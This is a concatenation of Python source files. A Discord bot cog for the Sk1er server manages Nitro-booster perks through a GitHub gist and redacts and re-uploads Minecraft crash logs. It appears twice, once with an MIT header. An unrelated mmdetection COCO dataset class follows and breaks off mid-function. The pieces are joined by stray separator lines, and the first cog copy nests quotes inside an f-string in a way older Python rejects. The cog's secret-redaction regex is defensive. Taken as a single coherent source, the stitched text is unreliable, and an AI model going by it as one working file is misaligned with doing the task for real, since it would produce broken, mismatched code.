from discord.ext import commands, tasks
from fire.http import Route
import datetime
import aiohttp
import discord
import json
import uuid
import re
class Sk1er(commands.Cog, name='Sk1er Discord'):
def __init__(self, bot):
self.bot = bot
self.guild = self.bot.get_guild(411619823445999637)
self.nitro = discord.utils.get(self.guild.roles, id=585534346551754755)
self.testrole = discord.utils.get(self.guild.roles, id=645067429067751436)
self.gist = 'b070e7f75a9083d2e211caffa0c772cc'
self.gistheaders = {'Authorization': f'token {bot.config['github']}'}
self.modcoreheaders = {'secret': bot.config['modcore']}
self.pastebinre = r'https://pastebin\.com/([^raw]\w+)'
self.logregex = r'((hyperium-)?crash-\d{4}-\d{2}-\d{2}_\d{2}\.\d{2}\.\d{2}.+\.txt|latest\.log|launcher_log\.txt|hs_err_pid\d{1,8}\.log)'
self.logtext = [
'net.minecraft.launchwrapper.Launch',
'# A fatal error has been detected by the Java Runtime Environment:',
'---- Minecraft Crash Report ----',
'A detailed walkthrough of the error',
'launchermeta.mojang.com',
'Running launcher core',
'Native Launcher Version:',
'[Client thread/INFO]: Setting user:',
'[Client thread/INFO]: (Session ID is',
'MojangTricksIntelDriversForPerformance',
'[DefaultDispatcher-worker-1] INFO Installer',
'[DefaultDispatcher-worker-1] ERROR Installer'
]
self.secrets = r'(club\.sk1er\.mods\.levelhead\.auth\.MojangAuth|api\.sk1er\.club\/auth|LoginPacket|SentryAPI\.cpp|"authHash":|"hash":"|--accessToken|\(Session ID is token:|Logging in with details: |Server-Hash: |Checking license key :)'
self.emailre = r'[a-zA-Z0-9_.+-]{1,50}@[a-zA-Z0-9-]{1,50}\.[a-zA-Z0-9-.]{1,10}'
self.urlre = r'(?:https:\/\/|http:\/\/)[-a-zA-Z0-9@:%._\+~#=]{1,256}\.[a-zA-Z0-9()]{1,6}\b([-a-zA-Z0-9()@:%_\+.~#?&\/\/=]*)'
self.homere = r'(/Users/\w+|/home/\w+|C:\\Users\\\w+)'
self.description_updater.start()
@tasks.loop(minutes=5)
async def description_updater(self):
try:
m = (await self.bot.http.sk1er.request(Route('GET', '/mods_analytics')))['combined_total']
m += (await (await aiohttp.ClientSession().get('https://api.autotip.pro/counts')).json())['total']
m += (await (await aiohttp.ClientSession().get('https://api.hyperium.cc/users')).json())['all']
await self.guild.edit(description=f'The Official Discord for Sk1er & Sk1er Mods ({m:,d} total players)')
except Exception as e:
pass
def cog_unload(self):
self.description_updater.cancel()
async def cog_check(self, ctx: commands.Context):
if ctx.guild.id == 411619823445999637:
return True
return False
@commands.Cog.listener()
async def on_member_remove(self, member):
if self.nitro in member.roles or self.testrole in member.roles:
route = Route(
'GET',
f'/gists/{self.gist}'
)
try:
gist = await self.bot.http.github.request(route, headers=self.gistheaders)
except Exception:
self.bot.logger.error(f'$REDFailed to fetch booster gist for $CYAN{member}')
return
text = gist.get('files', {}).get('boosters.json', {}).get('content', ['error'])
current = json.loads(text)
if 'error' in current:
return
try:
user = next(i for i in current if i["id"] == str(member.id))
mcuuid = user['uuid']
current.remove(user)
except Exception:
return
payload = {
'description': 'Nitro Booster dots for the Hyperium Client!',
'files': {
'boosters.json': {
'content': json.dumps(current, indent=2)
}
}
}
route = Route(
'GET',
f'/nitro/{mcuuid}/false'
)
try:
await self.bot.http.modcore.request(route, headers=self.modcoreheaders)
except Exception as e:
self.bot.logger.error(f'$REDFailed to remove nitro perks for $CYAN{mcuuid}')
route = Route(
'PATCH',
f'/gists/{self.gist}'
)
try:
gist = await self.bot.http.github.request(
route,
json=payload,
headers=self.gistheaders
)
except Exception:
self.bot.logger.error(f'$REDFailed to patch booster gist for $CYAN{mcuuid}')
return
general = self.guild.get_channel(411620457754787841)
await general.send(f'{member} left and their nitro perks have been removed.')
@commands.Cog.listener()
async def on_member_update(self, before, after):
if self.testrole in after.roles and after.id != 287698408855044097:
await after.remove_roles(self.testrole, reason='not geek')
if before.roles != after.roles:
broles = []
aroles = []
changed = []
for role in before.roles:
broles.append(role)
for role in after.roles:
aroles.append(role)
s = set(aroles)
removed = [x for x in broles if x not in s]
if self.nitro in removed or (self.testrole in removed and after.id == 287698408855044097):
if not self.bot.isascii(after.nick or after.name) or self.bot.ishoisted(after.nick or after.name):
await after.edit(nick=f'John Doe {after.discriminator}')
route = Route(
'GET',
f'/gists/{self.gist}'
)
try:
gist = await self.bot.http.github.request(
route,
headers=self.gistheaders
)
except Exception:
self.bot.logger.error(f'$REDFailed to get booster gist for $CYAN{after}')
return
text = gist.get('files', {}).get('boosters.json', {}).get('content', ['error'])
current = json.loads(text)
if 'error' in current:
return
try:
user = next(i for i in current if i["id"] == str(after.id))
mcuuid = user['uuid']
current.remove(user)
except Exception:
return
route = Route(
'GET',
f'/nitro/{mcuuid}/false'
)
try:
await self.bot.http.modcore.request(route, headers=self.modcoreheaders)
except Exception as e:
self.bot.logger.error(f'$REDFailed to remove modcore nitro perks for $CYAN{mcuuid}')
payload = {
'description': 'Nitro Booster dots for the Hyperium Client!',
'files': {
'boosters.json': {
'content': json.dumps(current, indent=2)
}
}
}
route = Route(
'PATCH',
f'/gists/{self.gist}'
)
try:
gist = await self.bot.http.github.request(
route,
json=payload,
headers=self.gistheaders
)
except Exception:
self.bot.logger.error(f'$REDFailed to patch booster gist for $CYAN{mcuuid}')
return
general = self.guild.get_channel(411620457754787841)
await general.send(f'{after.mention} Your nitro perks have been removed. Boost the server to get them back :)')
async def haste(self, content, fallback: bool=False):
url = 'hst.sh'
if fallback:
url = 'h.inv.wtf'
async with aiohttp.ClientSession().post(f'https://{url}/documents', data=content) as r:
if r.status != 200 and not fallback:
return await self.haste(content, fallback=True)
j = await r.json()
return f'<https://{url}/' + j['key'] + '>'
@commands.Cog.listener()
async def on_message(self, message):
if self.bot.dev:
return
pastebin = re.findall(self.pastebinre, message.content, re.MULTILINE)
for p in pastebin:
async with aiohttp.ClientSession().get(f'https://pastebin.com/raw/{p}') as r:
message.content = re.sub(self.pastebinre, (await r.text()), message.content, 0, re.MULTILINE)
for attach in message.attachments:
if not re.match(self.logregex, attach.filename) and not attach.filename == 'message.txt':
return
try:
txt = await attach.read()
except Exception as e:
self.bot.logger.error(f'$REDFailed to read log sent by $CYAN{message.author}', exc_info=e)
try:
txt = txt.decode('utf-8')
except Exception:
try:
txt = txt.decode('ISO-8859-1')
except Exception as e:
self.bot.logger.error(f'$REDFailed to decode log sent by $CYAN{message.author}', exc_info=e)
return # give up, leave the file there
txt = re.sub(self.emailre, '[removed email]', txt, 0, re.MULTILINE)
txt = re.sub(self.urlre, '[removed url]', txt, 0, re.MULTILINE)
txt = re.sub(self.homere, 'USER.HOME', txt, 0, re.MULTILINE)
for line in txt.split('\n'):
if re.findall(self.secrets, line, re.MULTILINE):
txt = txt.replace(line, '[line removed to protect sensitive info]')
if any(t in txt for t in self.logtext) and message.guild.id == 411619823445999637:
try:
url = await self.haste(txt)
except Exception as e:
self.bot.logger.error(f'$REDFailed to upload log to hastebin', exc_info=e)
return
await message.delete()
return await message.channel.send(f'{message.author} uploaded a log, {message.content}\n{url}')
if not message.attachments and len(message.content) > 350:
txt = message.content
txt = re.sub(self.emailre, '[removed email]', txt, 0, re.MULTILINE)
txt = re.sub(self.urlre, '[removed url]', txt, 0, re.MULTILINE)
txt = re.sub(self.homere, 'USER.HOME', txt, 0, re.MULTILINE)
for line in txt.split('\n'):
if re.findall(self.secrets, line, re.MULTILINE):
txt = txt.replace(line, '[line removed to protect sensitive info]')
if any(t in message.content for t in self.logtext) and message.guild.id == 411619823445999637:
try:
url = await self.haste(txt)
except Exception as e:
self.bot.logger.error(f'$REDFailed to upload log to hastebin', exc_info=e)
return
await message.delete()
return await message.channel.send(f'{message.author} sent a log, {url}')
@commands.command(description='Adds perks for Nitro Boosters')
async def nitroperks(self, ctx, ign: str = None):
if self.nitro not in ctx.author.roles and self.testrole not in ctx.author.roles:
return await ctx.send('no')
if not ign:
return await ctx.error('You must provide your Minecraft name!')
mid = await self.bot.get_cog('Hypixel Commands').name_to_uuid(ign)
if not mid:
return await ctx.error('No UUID found!')
progress = await ctx.send('Give me a moment.')
route = Route(
'GET',
f'/gists/{self.gist}'
)
try:
gist = await self.bot.http.github.request(
route,
headers=self.gistheaders
)
except Exception:
return await progress.edit(content='<:xmark:674359427830382603> Something went wrong when getting the list of boosters')
text = gist.get('files', {}).get('boosters.json', {}).get('content', ['error'])
current = json.loads(text)
if 'error' in current:
return await progress.edit(content='<:xmark:674359427830382603> Something went wrong when getting the list of boosters')
try:
user = next(i for i in current if i["id"] == str(ctx.author.id))
route = Route(
'GET',
f'/nitro/{user['uuid']}/false'
)
try:
await self.bot.http.modcore.request(route, headers=self.modcoreheaders)
except Exception as e:
return await progress.edit(f'<:xmark:674359427830382603> Failed to remove perks from previous user, {user['ign']}')
current.remove(user)
user['uuid'] = str(uuid.UUID(mid))
user['ign'] = ign
except Exception:
user = {
"uuid": str(uuid.UUID(mid)),
"ign": ign,
"id": str(ctx.author.id),
"color": "LIGHT_PURPLE"
}
current.append(user)
route = Route(
'GET',
f'/nitro/{user['uuid']}/true'
)
try:
await self.bot.http.modcore.request(route, headers=self.modcoreheaders)
except Exception as e:
self.bot.logger.warn(f'$YELLOWFailed to give perks on modcore', exc_info=e)
await ctx.error(f'Failed to give perks on modcore.')
payload = {
'description': 'Nitro Booster dots for the Hyperium Client!',
'files': {
'boosters.json': {
'content': json.dumps(current, indent=2)
}
}
}
route = Route(
'PATCH',
f'/gists/{self.gist}'
)
try:
gist = await self.bot.http.github.request(
route,
json=payload,
headers=self.gistheaders
)
except Exception:
return await ctx.error('Failed to give you the perks in Hyperium')
return await progress.edit(content='<:check:674359197378281472> Successfully gave you the perks!')
def setup(bot):
bot.add_cog(Sk1er(bot))
bot.logger.info(f'$GREENLoaded cog for discord.gg/sk1er!')
| """
MIT License
Copyright (c) 2020 GamingGeek
Permission is hereby granted, free of charge, to any person obtaining a copy of this software
and associated documentation files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from discord.ext import commands, tasks
from fire.http import Route
import datetime
import aiohttp
import discord
import json
import uuid
import re
class Sk1er(commands.Cog, name='Sk1er Discord'):
def __init__(self, bot):
self.bot = bot
self.guild = self.bot.get_guild(411619823445999637)
self.nitro = discord.utils.get(self.guild.roles, id=585534346551754755)
self.testrole = discord.utils.get(self.guild.roles, id=645067429067751436)
self.gist = 'b070e7f75a9083d2e211caffa0c772cc'
self.gistheaders = {'Authorization': f'token {bot.config["github"]}'}
self.modcoreheaders = {'secret': bot.config['modcore']}
self.pastebinre = r'https://pastebin\.com/([^raw]\w+)'
self.logregex = r'((hyperium-)?crash-\d{4}-\d{2}-\d{2}_\d{2}\.\d{2}\.\d{2}.+\.txt|latest\.log|launcher_log\.txt|hs_err_pid\d{1,8}\.log)'
self.logtext = [
'net.minecraft.launchwrapper.Launch',
'# A fatal error has been detected by the Java Runtime Environment:',
'---- Minecraft Crash Report ----',
'A detailed walkthrough of the error',
'launchermeta.mojang.com',
'Running launcher core',
'Native Launcher Version:',
'[Client thread/INFO]: Setting user:',
'[Client thread/INFO]: (Session ID is',
'MojangTricksIntelDriversForPerformance',
'[DefaultDispatcher-worker-1] INFO Installer',
'[DefaultDispatcher-worker-1] ERROR Installer'
]
self.secrets = r'(club\.sk1er\.mods\.levelhead\.auth\.MojangAuth|api\.sk1er\.club\/auth|LoginPacket|SentryAPI\.cpp|"authHash":|"hash":"|--accessToken|\(Session ID is token:|Logging in with details: |Server-Hash: |Checking license key :)'
self.emailre = r'[a-zA-Z0-9_.+-]{1,50}@[a-zA-Z0-9-]{1,50}\.[a-zA-Z0-9-.]{1,10}'
self.urlre = r'(?:https:\/\/|http:\/\/)[-a-zA-Z0-9@:%._\+~#=]{1,256}\.[a-zA-Z0-9()]{1,6}\b([-a-zA-Z0-9()@:%_\+.~#?&\/\/=]*)'
self.homere = r'(/Users/\w+|/home/\w+|C:\\Users\\\w+)'
self.description_updater.start()
@tasks.loop(minutes=5)
async def description_updater(self):
try:
m = (await self.bot.http.sk1er.request(Route('GET', '/mods_analytics')))['combined_total']
m += (await (await aiohttp.ClientSession().get('https://api.autotip.pro/counts')).json())['total']
m += (await (await aiohttp.ClientSession().get('https://api.hyperium.cc/users')).json())['all']
await self.guild.edit(description=f'The Official Discord for Sk1er & Sk1er Mods ({m:,d} total players)')
except Exception as e:
pass
def cog_unload(self):
self.description_updater.cancel()
async def cog_check(self, ctx: commands.Context):
if ctx.guild.id == 411619823445999637:
return True
return False
@commands.Cog.listener()
async def on_member_remove(self, member):
if self.nitro in member.roles or self.testrole in member.roles:
route = Route(
'GET',
f'/gists/{self.gist}'
)
try:
gist = await self.bot.http.github.request(route, headers=self.gistheaders)
except Exception:
self.bot.logger.error(f'$REDFailed to fetch booster gist for $CYAN{member}')
return
text = gist.get('files', {}).get('boosters.json', {}).get('content', ['error'])
current = json.loads(text)
if 'error' in current:
return
try:
user = next(i for i in current if i["id"] == str(member.id))
mcuuid = user['uuid']
current.remove(user)
except Exception:
return
payload = {
'description': 'Nitro Booster dots for the Hyperium Client!',
'files': {
'boosters.json': {
'content': json.dumps(current, indent=2)
}
}
}
route = Route(
'GET',
f'/nitro/{mcuuid}/false'
)
try:
await self.bot.http.modcore.request(route, headers=self.modcoreheaders)
except Exception as e:
self.bot.logger.error(f'$REDFailed to remove nitro perks for $CYAN{mcuuid}')
route = Route(
'PATCH',
f'/gists/{self.gist}'
)
try:
gist = await self.bot.http.github.request(
route,
json=payload,
headers=self.gistheaders
)
except Exception:
self.bot.logger.error(f'$REDFailed to patch booster gist for $CYAN{mcuuid}')
return
general = self.guild.get_channel(411620457754787841)
await general.send(f'{member} left and their nitro perks have been removed.')
@commands.Cog.listener()
async def on_member_update(self, before, after):
if self.testrole in after.roles and after.id != 287698408855044097:
await after.remove_roles(self.testrole, reason='not geek')
if before.roles != after.roles:
broles = []
aroles = []
changed = []
for role in before.roles:
broles.append(role)
for role in after.roles:
aroles.append(role)
s = set(aroles)
removed = [x for x in broles if x not in s]
if self.nitro in removed or (self.testrole in removed and after.id == 287698408855044097):
if not self.bot.isascii(after.nick or after.name) or self.bot.ishoisted(after.nick or after.name):
await after.edit(nick=f'John Doe {after.discriminator}')
route = Route(
'GET',
f'/gists/{self.gist}'
)
try:
gist = await self.bot.http.github.request(
route,
headers=self.gistheaders
)
except Exception:
self.bot.logger.error(f'$REDFailed to get booster gist for $CYAN{after}')
return
text = gist.get('files', {}).get('boosters.json', {}).get('content', ['error'])
current = json.loads(text)
if 'error' in current:
return
try:
user = next(i for i in current if i["id"] == str(after.id))
mcuuid = user['uuid']
current.remove(user)
except Exception:
return
route = Route(
'GET',
f'/nitro/{mcuuid}/false'
)
try:
await self.bot.http.modcore.request(route, headers=self.modcoreheaders)
except Exception as e:
self.bot.logger.error(f'$REDFailed to remove modcore nitro perks for $CYAN{mcuuid}')
payload = {
'description': 'Nitro Booster dots for the Hyperium Client!',
'files': {
'boosters.json': {
'content': json.dumps(current, indent=2)
}
}
}
route = Route(
'PATCH',
f'/gists/{self.gist}'
)
try:
gist = await self.bot.http.github.request(
route,
json=payload,
headers=self.gistheaders
)
except Exception:
self.bot.logger.error(f'$REDFailed to patch booster gist for $CYAN{mcuuid}')
return
general = self.guild.get_channel(411620457754787841)
await general.send(f'{after.mention} Your nitro perks have been removed. Boost the server to get them back :)')
async def haste(self, content, fallback: bool=False):
url = 'hst.sh'
if fallback:
url = 'h.inv.wtf'
async with aiohttp.ClientSession().post(f'https://{url}/documents', data=content) as r:
if r.status != 200 and not fallback:
return await self.haste(content, fallback=True)
j = await r.json()
return f'<https://{url}/' + j['key'] + '>'
@commands.Cog.listener()
async def on_message(self, message):
if self.bot.dev:
return
pastebin = re.findall(self.pastebinre, message.content, re.MULTILINE)
for p in pastebin:
async with aiohttp.ClientSession().get(f'https://pastebin.com/raw/{p}') as r:
message.content = re.sub(self.pastebinre, (await r.text()), message.content, 0, re.MULTILINE)
for attach in message.attachments:
if not re.match(self.logregex, attach.filename) and not attach.filename == 'message.txt':
return
try:
txt = await attach.read()
except Exception as e:
self.bot.logger.error(f'$REDFailed to read log sent by $CYAN{message.author}', exc_info=e)
try:
txt = txt.decode('utf-8')
except Exception:
try:
txt = txt.decode('ISO-8859-1')
except Exception as e:
self.bot.logger.error(f'$REDFailed to decode log sent by $CYAN{message.author}', exc_info=e)
return # give up, leave the file there
txt = re.sub(self.emailre, '[removed email]', txt, 0, re.MULTILINE)
txt = re.sub(self.urlre, '[removed url]', txt, 0, re.MULTILINE)
txt = re.sub(self.homere, 'USER.HOME', txt, 0, re.MULTILINE)
for line in txt.split('\n'):
if re.findall(self.secrets, line, re.MULTILINE):
txt = txt.replace(line, '[line removed to protect sensitive info]')
if any(t in txt for t in self.logtext) and message.guild.id == 411619823445999637:
try:
url = await self.haste(txt)
except Exception as e:
self.bot.logger.error(f'$REDFailed to upload log to hastebin', exc_info=e)
return
await message.delete()
return await message.channel.send(f'{message.author} uploaded a log, {message.content}\n{url}')
if not message.attachments and len(message.content) > 350:
txt = message.content
txt = re.sub(self.emailre, '[removed email]', txt, 0, re.MULTILINE)
txt = re.sub(self.urlre, '[removed url]', txt, 0, re.MULTILINE)
txt = re.sub(self.homere, 'USER.HOME', txt, 0, re.MULTILINE)
for line in txt.split('\n'):
if re.findall(self.secrets, line, re.MULTILINE):
txt = txt.replace(line, '[line removed to protect sensitive info]')
if any(t in message.content for t in self.logtext) and message.guild.id == 411619823445999637:
try:
url = await self.haste(txt)
except Exception as e:
self.bot.logger.error(f'$REDFailed to upload log to hastebin', exc_info=e)
return
await message.delete()
return await message.channel.send(f'{message.author} sent a log, {url}')
@commands.command(description='Adds perks for Nitro Boosters')
async def nitroperks(self, ctx, ign: str = None):
if self.nitro not in ctx.author.roles and self.testrole not in ctx.author.roles:
return await ctx.send('no')
if not ign:
return await ctx.error('You must provide your Minecraft name!')
mid = await self.bot.get_cog('Hypixel Commands').name_to_uuid(ign)
if not mid:
return await ctx.error('No UUID found!')
progress = await ctx.send('Give me a moment.')
route = Route(
'GET',
f'/gists/{self.gist}'
)
try:
gist = await self.bot.http.github.request(
route,
headers=self.gistheaders
)
except Exception:
return await progress.edit(content='<:xmark:674359427830382603> Something went wrong when getting the list of boosters')
text = gist.get('files', {}).get('boosters.json', {}).get('content', ['error'])
current = json.loads(text)
if 'error' in current:
return await progress.edit(content='<:xmark:674359427830382603> Something went wrong when getting the list of boosters')
try:
user = next(i for i in current if i["id"] == str(ctx.author.id))
route = Route(
'GET',
f'/nitro/{user["uuid"]}/false'
)
try:
await self.bot.http.modcore.request(route, headers=self.modcoreheaders)
except Exception as e:
return await progress.edit(f'<:xmark:674359427830382603> Failed to remove perks from previous user, {user["ign"]}')
current.remove(user)
user['uuid'] = str(uuid.UUID(mid))
user['ign'] = ign
except Exception:
user = {
"uuid": str(uuid.UUID(mid)),
"ign": ign,
"id": str(ctx.author.id),
"color": "LIGHT_PURPLE"
}
current.append(user)
route = Route(
'GET',
f'/nitro/{user["uuid"]}/true'
)
try:
await self.bot.http.modcore.request(route, headers=self.modcoreheaders)
except Exception as e:
self.bot.logger.warn(f'$YELLOWFailed to give perks on modcore', exc_info=e)
await ctx.error(f'Failed to give perks on modcore.')
payload = {
'description': 'Nitro Booster dots for the Hyperium Client!',
'files': {
'boosters.json': {
'content': json.dumps(current, indent=2)
}
}
}
route = Route(
'PATCH',
f'/gists/{self.gist}'
)
try:
gist = await self.bot.http.github.request(
route,
json=payload,
headers=self.gistheaders
)
except Exception:
return await ctx.error('Failed to give you the perks in Hyperium')
return await progress.edit(content='<:check:674359197378281472> Successfully gave you the perks!')
def setup(bot):
bot.add_cog(Sk1er(bot))
bot.logger.info(f'$GREENLoaded cog for discord.gg/sk1er!')
|
import itertools
import logging
import os.path as osp
import tempfile
import mmcv
import numpy as np
from mmcv.utils import print_log
from pycocotools.coco import COCO
#from pycocotools.cocoeval import COCOeval
from mmdet.datasets.fast_eval_api import COCOeval_opt as COCOeval
from terminaltables import AsciiTable
from mmdet.core import eval_recalls
from .builder import DATASETS
from .custom import CustomDataset
try:
import pycocotools
assert pycocotools.__version__ >= '12.0.2'
except AssertionError:
raise AssertionError('Incompatible version of pycocotools is installed. '
'Run pip uninstall pycocotools first. Then run pip '
'install mmpycocotools to install open-mmlab forked '
'pycocotools.')
@DATASETS.register_module()
class CocoDataset(CustomDataset):
CLASSES = ('person', 'bicycle', 'car', 'motorcycle', 'airplane', 'bus',
'train', 'truck', 'boat', 'traffic light', 'fire hydrant',
'stop sign', 'parking meter', 'bench', 'bird', 'cat', 'dog',
'horse', 'sheep', 'cow', 'elephant', 'bear', 'zebra', 'giraffe',
'backpack', 'umbrella', 'handbag', 'tie', 'suitcase', 'frisbee',
'skis', 'snowboard', 'sports ball', 'kite', 'baseball bat',
'baseball glove', 'skateboard', 'surfboard', 'tennis racket',
'bottle', 'wine glass', 'cup', 'fork', 'knife', 'spoon', 'bowl',
'banana', 'apple', 'sandwich', 'orange', 'broccoli', 'carrot',
'hot dog', 'pizza', 'donut', 'cake', 'chair', 'couch',
'potted plant', 'bed', 'dining table', 'toilet', 'tv', 'laptop',
'mouse', 'remote', 'keyboard', 'cell phone', 'microwave',
'oven', 'toaster', 'sink', 'refrigerator', 'book', 'clock',
'vase', 'scissors', 'teddy bear', 'hair drier', 'toothbrush')
def load_annotations(self, ann_file):
"""Load annotation from COCO style annotation file.
Args:
ann_file (str): Path of annotation file.
Returns:
list[dict]: Annotation info from COCO api.
"""
self.coco = COCO(ann_file)
self.cat_ids = self.coco.get_cat_ids(cat_names=self.CLASSES)
self.cat2label = {cat_id: i for i, cat_id in enumerate(self.cat_ids)}
self.img_ids = self.coco.get_img_ids()
data_infos = []
for i in self.img_ids:
info = self.coco.load_imgs([i])[0]
info['filename'] = info['file_name']
data_infos.append(info)
return data_infos
def get_ann_info(self, idx):
"""Get COCO annotation by index.
Args:
idx (int): Index of data.
Returns:
dict: Annotation info of specified index.
"""
img_id = self.data_infos[idx]['id']
ann_ids = self.coco.get_ann_ids(img_ids=[img_id])
ann_info = self.coco.load_anns(ann_ids)
return self._parse_ann_info(self.data_infos[idx], ann_info)
def get_cat_ids(self, idx):
"""Get COCO category ids by index.
Args:
idx (int): Index of data.
Returns:
list[int]: All categories in the image of specified index.
"""
img_id = self.data_infos[idx]['id']
ann_ids = self.coco.get_ann_ids(img_ids=[img_id])
ann_info = self.coco.load_anns(ann_ids)
return [ann['category_id'] for ann in ann_info]
def _filter_imgs(self, min_size=32):
"""Filter images too small or without ground truths."""
valid_inds = []
# obtain images that contain annotation
ids_with_ann = set(_['image_id'] for _ in self.coco.anns.values())
# obtain images that contain annotations of the required categories
ids_in_cat = set()
for i, class_id in enumerate(self.cat_ids):
ids_in_cat |= set(self.coco.cat_img_map[class_id])
# merge the image id sets of the two conditions and use the merged set
# to filter out images if self.filter_empty_gt=True
ids_in_cat &= ids_with_ann
valid_img_ids = []
for i, img_info in enumerate(self.data_infos):
img_id = self.img_ids[i]
if self.filter_empty_gt and img_id not in ids_in_cat:
continue
if min(img_info['width'], img_info['height']) >= min_size:
valid_inds.append(i)
valid_img_ids.append(img_id)
self.img_ids = valid_img_ids
return valid_inds
def _parse_ann_info(self, img_info, ann_info):
"""Parse bbox and mask annotation.
Args:
ann_info (list[dict]): Annotation info of an image.
with_mask (bool): Whether to parse mask annotations.
Returns:
dict: A dict containing the following keys: bboxes, bboxes_ignore,\
labels, masks, seg_map. "masks" are raw annotations and not \
decoded into binary masks.
"""
gt_bboxes = []
gt_labels = []
gt_bboxes_ignore = []
gt_masks_ann = []
for i, ann in enumerate(ann_info):
if ann.get('ignore', False):
continue
x1, y1, w, h = ann['bbox']
inter_w = max(0, min(x1 + w, img_info['width']) - max(x1, 0))
inter_h = max(0, min(y1 + h, img_info['height']) - max(y1, 0))
if inter_w * inter_h == 0:
continue
if ann['area'] <= 0 or w < 1 or h < 1:
continue
if ann['category_id'] not in self.cat_ids:
continue
bbox = [x1, y1, x1 + w, y1 + h]
if ann.get('iscrowd', False):
gt_bboxes_ignore.append(bbox)
else:
gt_bboxes.append(bbox)
gt_labels.append(self.cat2label[ann['category_id']])
gt_masks_ann.append(ann.get('segmentation', None))
if gt_bboxes:
gt_bboxes = np.array(gt_bboxes, dtype=np.float32)
gt_labels = np.array(gt_labels, dtype=np.int64)
else:
gt_bboxes = np.zeros((0, 4), dtype=np.float32)
gt_labels = np.array([], dtype=np.int64)
if gt_bboxes_ignore:
gt_bboxes_ignore = np.array(gt_bboxes_ignore, dtype=np.float32)
else:
gt_bboxes_ignore = np.zeros((0, 4), dtype=np.float32)
seg_map = img_info['filename'].replace('jpg', 'png')
#print('---'*100)
#print(img_info)
ann = dict(
bboxes=gt_bboxes,
labels=gt_labels,
bboxes_ignore=gt_bboxes_ignore,
masks=gt_masks_ann,
seg_map=seg_map)
return ann
def xyxy2xywh(self, bbox):
"""Convert ``xyxy`` style bounding boxes to ``xywh`` style for COCO
evaluation.
Args:
bbox (numpy.ndarray): The bounding boxes, shape (4, ), in
``xyxy`` order.
Returns:
list[float]: The converted bounding boxes, in ``xywh`` order.
"""
_bbox = bbox.tolist()
return [
_bbox[0],
_bbox[1],
_bbox[2] - _bbox[0],
_bbox[3] - _bbox[1],
]
def _proposal2json(self, results):
"""Convert proposal results to COCO json style."""
json_results = []
for idx in range(len(self)):
img_id = self.img_ids[idx]
bboxes = results[idx]
for i in range(bboxes.shape[0]):
data = dict()
data['image_id'] = img_id
data['bbox'] = self.xyxy2xywh(bboxes[i])
data['score'] = float(bboxes[i][4])
data['category_id'] = 1
json_results.append(data)
return json_results
def _det2json(self, results):
"""Convert detection results to COCO json style."""
json_results = []
for idx in range(len(self)):
img_id = self.img_ids[idx]
result = results[idx]
for label in range(len(result)):
bboxes = result[label]
for i in range(bboxes.shape[0]):
data = dict()
data['image_id'] = img_id
data['bbox'] = self.xyxy2xywh(bboxes[i])
data['score'] = float(bboxes[i][4])
data['category_id'] = self.cat_ids[label]
json_results.append(data)
return json_results
def _segm2json(self, results):
"""Convert instance segmentation results to COCO json style."""
bbox_json_results = []
segm_json_results = []
for idx in range(len(self)):
img_id = self.img_ids[idx]
det, seg = results[idx]
for label in range(len(det)):
# bbox results
bboxes = det[label]
for i in range(bboxes.shape[0]):
data = dict()
data['image_id'] = img_id
data['bbox'] = self.xyxy2xywh(bboxes[i])
data['score'] = float(bboxes[i][4])
data['category_id'] = self.cat_ids[label]
bbox_json_results.append(data)
# segm results
# some detectors use different scores for bbox and mask
if isinstance(seg, tuple):
segms = seg[0][label]
mask_score = seg[1][label]
else:
segms = seg[label]
mask_score = [bbox[4] for bbox in bboxes]
for i in range(bboxes.shape[0]):
data = dict()
data['image_id'] = img_id
data['bbox'] = self.xyxy2xywh(bboxes[i])
data['score'] = float(mask_score[i])
data['category_id'] = self.cat_ids[label]
if isinstance(segms[i]['counts'], bytes):
segms[i]['counts'] = segms[i]['counts'].decode()
data['segmentation'] = segms[i]
segm_json_results.append(data)
return bbox_json_results, segm_json_results
def results2json(self, results, outfile_prefix):
"""Dump the detection results to a COCO style json file.
There are 3 types of results: proposals, bbox predictions, mask
predictions, and they have different data types. This method will
automatically recognize the type, and dump them to json files.
Args:
results (list[list | tuple | ndarray]): Testing results of the
dataset.
outfile_prefix (str): The filename prefix of the json files. If the
prefix is "somepath/xxx", the json files will be named
"somepath/xxx.bbox.json", "somepath/xxx.segm.json",
"somepath/xxx.proposal.json".
Returns:
dict[str: str]: Possible keys are "bbox", "segm", "proposal", and \
values are corresponding filenames.
"""
result_files = dict()
if isinstance(results[0], list):
json_results = self._det2json(results)
result_files['bbox'] = f'{outfile_prefix}.bbox.json'
result_files['proposal'] = f'{outfile_prefix}.bbox.json'
mmcv.dump(json_results, result_files['bbox'])
elif isinstance(results[0], tuple):
json_results = self._segm2json(results)
result_files['bbox'] = f'{outfile_prefix}.bbox.json'
result_files['proposal'] = f'{outfile_prefix}.bbox.json'
result_files['segm'] = f'{outfile_prefix}.segm.json'
mmcv.dump(json_results[0], result_files['bbox'])
mmcv.dump(json_results[1], result_files['segm'])
elif isinstance(results[0], np.ndarray):
json_results = self._proposal2json(results)
result_files['proposal'] = f'{outfile_prefix}.proposal.json'
mmcv.dump(json_results, result_files['proposal'])
else:
raise TypeError('invalid type of results')
return result_files
def fast_eval_recall(self, results, proposal_nums, iou_thrs, logger=None):
gt_bboxes = []
for i in range(len(self.img_ids)):
ann_ids = self.coco.get_ann_ids(img_ids=self.img_ids[i])
ann_info = self.coco.load_anns(ann_ids)
if len(ann_info) == 0:
gt_bboxes.append(np.zeros((0, 4)))
continue
bboxes = []
for ann in ann_info:
if ann.get('ignore', False) or ann['iscrowd']:
continue
x1, y1, w, h = ann['bbox']
bboxes.append([x1, y1, x1 + w, y1 + h])
bboxes = np.array(bboxes, dtype=np.float32)
if bboxes.shape[0] == 0:
bboxes = np.zeros((0, 4))
